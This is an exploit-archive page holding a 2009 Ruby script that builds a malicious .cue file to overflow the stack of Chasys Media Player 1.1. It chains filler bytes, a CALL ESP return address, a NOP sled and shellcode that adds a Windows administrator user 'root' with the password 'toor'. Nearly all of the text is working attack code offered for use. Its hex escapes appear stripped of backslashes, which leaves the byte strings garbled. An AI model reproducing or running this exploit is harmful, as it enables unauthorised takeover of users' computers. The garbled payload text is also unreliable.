Chasys Media Player 1.1 .cue File Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Chasys Media Player 1.1 .cue File Stack Overflow Exploit
# Published : 2009-03-19
# Author : Stack
# Previous Title : BS.Player 2.34 (.bsl) Universal SEH Overwrite Exploit
# Next Title : RM Downloader (.smi File) Local Stack Overflow Exploit

#!/usr/bin/env ruby
# Chasys Media Player 1.1 .cue file Stack Overflow Exploit
# By Stack
# Mountassif Moad
# cat thnx.txt
# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d
#
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.cue'
time1 = Time.new
$VERBOSE=nil
Header1= "x5Bx70x6Cx61x79x6Cx69"+
         "x73x74x5Dx0Dx46x69x6C"+
   	 "x65x31x3D"
  
  
Header2= "x0Dx0Ax54x52x41x43x4Bx20x30x31x20x4Dx4Fx44x45x31x2Fx32"+
         "x33x35x32x0Dx0Ax20x20x20x49x4Ex44x45x58x20x30x31"+
         "x20x30x30x3Ax30x30x3Ax30x30"
  
  
# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
"x42x50x42x30x42x30x4bx38x45x54x4ex33x4bx38x4ex47"+
"x45x30x4ax57x41x50x4fx4ex4bx58x4fx54x4ax31x4bx48"+
"x4fx35x42x32x41x50x4bx4ex49x54x4bx58x46x53x4bx58"+
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c"+
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx33x46x45x46x42x46x50x45x57x45x4ex4bx48"+
"x4fx55x46x42x41x30x4bx4ex48x56x4bx48x4ex50x4bx34"+
"x4bx48x4fx35x4ex31x41x30x4bx4ex4bx48x4ex41x4bx58"+
"x41x30x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53"+
"x42x4cx46x36x4bx38x42x44x42x53x45x38x42x4cx4ax57"+
"x4ex50x4bx38x42x54x4ex50x4bx58x42x57x4ex41x4dx4a"+
"x4bx38x4ax56x4ax30x4bx4ex49x30x4bx48x42x58x42x4b"+
"x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx35x41x53"+
"x48x4fx42x46x48x55x49x48x4ax4fx43x48x42x4cx4bx37"+
"x42x55x4ax56x42x4fx4cx58x46x50x4fx45x4ax36x4ax39"+
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x4dx46"+
"x46x56x50x52x45x36x4ax47x45x46x42x52x4fx32x43x46"+
"x42x52x50x56x45x56x46x37x42x52x45x57x43x57x45x46"+
"x44x37x42x32x44x47x4fx46x4fx56x46x37x42x32x46x37"+
"x4fx36x4fx56x44x57x42x52x4fx42x41x44x46x54x46x34"+
"x42x52x48x52x48x52x42x32x50x56x45x36x46x37x42x52"+
"x4ex36x4fx46x43x56x41x56x4ex36x47x36x44x57x4fx36"+
"x45x57x42x47x42x52x41x34x46x46x4dx36x49x46x50x56"+
"x49x36x43x47x46x47x44x37x41x36x46x57x4fx56x44x57"+
"x43x47x42x32x44x57x4fx56x4fx46x46x47x42x32x4fx32"+
"x41x54x46x54x46x54x42x50x5a"
Over     = "x41" * 260
Nop      = "x90" * 20
Ret      = "x5Dx38x82x7C" # CALL ESP kernel32.dll Sp 2 FR & EN 
   # "x35x16x39x77" # CALL ESP Universel If box Have .Net 2
   # ( this is my methode if i dont find an universel address in app i find adress
   # in some famouse softwar who the victime 90 % install it )

Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2
File.open( files+".cue", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".cue :d"
end

# www.Syue.com [2009-03-19]